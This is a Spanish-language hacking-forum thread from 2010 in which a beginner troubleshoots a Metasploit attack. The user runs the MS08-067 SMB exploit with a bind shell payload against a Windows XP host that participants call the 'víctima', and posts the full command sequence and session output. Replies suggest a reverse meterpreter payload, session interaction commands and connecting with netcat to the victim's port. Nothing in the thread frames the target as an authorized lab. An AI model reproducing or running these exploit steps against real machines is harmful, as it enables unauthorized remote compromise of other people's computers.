elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Problema Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Problema Metasploit  (Leído 12,130 veces)
marcucho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Problema Metasploit
« en: 21 Julio 2010, 12:45 pm »

Hola a todos.
Tengo un pequeño problema con metasploit, realizo los siguiente para obtener una shell

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.53
RHOST => 192.168.1.53
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.53     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The listen port
   RHOST     192.168.1.53     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

Dándome como resultado el siguiente:

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Attempting to trigger the vulnerability...
  • Sending stage (240 bytes) to 192.168.1.53
  • Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010



Pero se queda hay no me aparece la shell, es decir,


Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.
« Última modificación: 21 Julio 2010, 12:47 pm por marcucho » En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Problema Metasploit
« Respuesta #1 en: 21 Julio 2010, 13:03 pm »

haz un nmap al puerto 4444 al pc víctima a ver que dice...
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Problema Metasploit
« Respuesta #2 en: 21 Julio 2010, 13:21 pm »

usa el payload reverse meterpreter tcp y luego sessions -l y veras la sesiones activas que sera una la que acabas de conseguir asi que sessions y el numero y ya esta la shell del meterpreter q aunq sea diferente tiene mas opciones por ejemplo upload para subir archivos....


Saludos Søra
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema Metasploit
« Respuesta #3 en: 21 Julio 2010, 17:35 pm »

Porque aun no has mirado las sessiones?
Cuando las mires haz:

sessions -i (de interactuar xD) numSession

En tu caso quedaria algo asi:
Código:
sessions -i 1

Y obtendrias la shell remota :)
En línea

wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Problema Metasploit
« Respuesta #4 en: 21 Julio 2010, 17:37 pm »

ummm

Citar
Pero se queda hay no me aparece la shell, es decir,


Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.


Ya tienes la shell. Por lo que veo estas usando ubuntu y tras lanzar el exploit te aparece:
C:\WINDOWS\System32> 

Pues ya tienes la shell del pc victima :S



no??
« Última modificación: 21 Julio 2010, 17:39 pm por wACtOr » En línea

marcucho

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Problema Metasploit
« Respuesta #5 en: 21 Julio 2010, 18:05 pm »

Es que ese es el problema que se queda en blanco, no aparece esto:

C:\WINDOWS\system32>

Cuando da el ok que todo lo ha hecho bien, esto
--------------------------------------------------------------------------------------

*Started bind handler
*Automatically detecting the target...
*Fingerprint: Windows XP Service Pack 3 - lang:Spanish
*Selected Target: Windows XP SP3 Spanish (NX)
*Attempting to trigger the vulnerability...
*Sending stage (240 bytes) to 192.168.1.53
*Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010


-----------------------------------------------------------------------------------------------


Después debe tardar unos segundo o milésimas en aparece C:\WINDOWS\system32>
bueno pues a mi no me aparece, y yo me quedo esperando 10 minutos y no aparece, y cual es el problema que no puedo hacer:

sessions -i 1

porque tampoco aparece msf >, se queda en blanco, no se si es que da algún error interno que no muestra, se queda como colgado lo único que me queda es ctrl + c y claro cierra sesión.

Gracias a todos por contestar.
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema Metasploit
« Respuesta #6 en: 21 Julio 2010, 18:52 pm »

prueba a hacer nc al 4444 de la victima y probablemente obtengas la shell :)

Saludos
En línea

wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Problema Metasploit
« Respuesta #7 en: 21 Julio 2010, 18:57 pm »

por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema Metasploit
« Respuesta #8 en: 21 Julio 2010, 20:08 pm »

por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
Si no quieres muchos problemas prueba Backtrack4 xD

Saludos
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Problema Metasploit
« Respuesta #9 en: 24 Julio 2010, 00:06 am »

por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
+1, las veces que lo he instalado lo hago desde SVN
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
problema al instalar metasploit
Bugs y Exploits
xusosmool 9 8,527 Último mensaje 25 Junio 2011, 11:44 am
por dec0
problema con la instalacion de metasploit
Bugs y Exploits
iPeZ 3 3,554 Último mensaje 17 Febrero 2011, 01:47 am
por locot3
Problema con el metasploit
Hacking
InEtCrAsH 2 3,894 Último mensaje 10 Abril 2011, 13:03 pm
por Slava_TZD
Problema al Instalar metasploit
Bugs y Exploits
eljonax 3 5,560 Último mensaje 3 Abril 2011, 15:41 pm
por AlbertoBSD
Problema Metasploit en CentOS6
Hacking
opmeitle 0 2,498 Último mensaje 6 Mayo 2012, 21:55 pm
por opmeitle
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines